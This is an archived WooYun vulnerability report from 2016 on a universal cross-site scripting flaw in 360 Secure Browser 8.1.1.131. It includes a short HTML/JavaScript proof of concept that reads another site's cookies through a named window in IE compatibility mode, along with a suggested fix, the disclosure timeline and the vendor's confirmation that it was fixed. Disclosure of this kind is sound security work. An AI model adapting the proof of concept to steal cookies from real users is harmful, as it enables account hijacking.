破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

360安全浏览器8.1.1.131 UXSS可读取任意网站信息

编号177697
Urlhttp://www.wooyun.org/bug.php?action=view&id=177697
漏洞状态厂商已经修复
漏洞标题360安全浏览器8.1.1.131 UXSS可读取任意网站信息
漏洞类型敏感信息泄露
厂商奇虎360
白帽子blast
提交日期2016-02-22 17:03:00
公开日期2016-05-23 19:20:00
修复时间2016-05-23 19:20:00
确认时间2016-02-23 00:00:00
Confirm Spend1
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank20
厂商评级
厂商评rank15
漏洞简介
在集市换了个东西,赫然发现没有WB进不了zone了……
漏洞细节

测试环境:
360:**.**.**.**
Windows 10, IE11
使用<meta name="renderer" content="ie-comp">固定在兼容模式即可触发,如果没有触发,请手动切换到兼容模式(IE)
测试中的url http://z.mytest:81/是我host配来测试用的,复现时自己本地搭建一下环境吧~

<html>
<head>
<meta name="renderer" content="ie-comp">
</head>
<body>
<script language="javascript">
function g() {
x=window;
x.open('http://**.**.**.**', 'z');
x.open('javascript:alert(location.href + document.cookie);', 'z');
}
</script>
<a href="javascript:g();" id="b" style="font-size:72px">CLICK ME</a>
</body>
</html>

POC

QQ图片20160222155522.jpg


视频录像:
http://**.**.**.**/41a006bdf687ff1de3375f3cd284d10d

修复方案

检查在同一名称下打开URI的协议

状态信息 2016-02-22: 细节已通知厂商并且等待厂商处理中
2016-02-23: 厂商已经确认,细节仅向厂商公开
2016-04-18: 细节向核心白帽子及相关领域专家公开
2016-04-28: 细节向普通白帽子公开
2016-05-08: 细节向实习白帽子公开
2016-05-23: 厂商已经修复漏洞并主动公开,细节向公众公开
厂商回复感谢白帽子提交的报告,我们第一时间反馈给产品部门发布新版本跟新跟进。
回应信息危害等级:高漏洞Rank:15 确认时间:2016-02-23 19:20
Showing 1-18 of 18 items.
评论内容评论人点赞数评论时间

(ง •̀_•́)ง

SH0X800102016-02-24 00:32:00

(ง •̀_•́)ง

哈萨克小伙子02016-02-23 22:49:00

(ง •̀_•́)ง

secart02016-02-23 19:27:00

啪啪啪

sangfor.org02016-02-22 22:15:00

@PiaCa 手机回复的居然是空白- -下次再碰到了可以搞个任意代码执行 2333

blast02016-02-22 19:33:00

@PiaCa

blast02016-02-22 18:51:00

这种漏洞深入一下会更好啊

PiaCa02016-02-22 18:36:00

(ง •̀_•́)ง

红客十年02016-02-22 18:23:00

(ง •̀_•́)ง

随风的风02016-02-22 17:27:00

(ง •̀_•́)ง

MAX丶02016-02-22 17:22:00

(ง •̀_•́)ง

HackBraid02016-02-22 17:18:00

陆由乙02016-02-22 17:16:00

(ง •̀_•́)ง

zeracker02016-02-22 17:12:00

(ง •̀_•́)ง

坏男孩-A_A02016-02-22 17:11:00

膜拜!

我是小号02016-02-22 17:11:00

(ง •̀_•́)ง

px162402016-02-22 17:09:00

@数据流 (ง •̀_•́)ง

blast02016-02-22 17:08:00

(ง •̀_•́)ง

数据流02016-02-22 17:07:00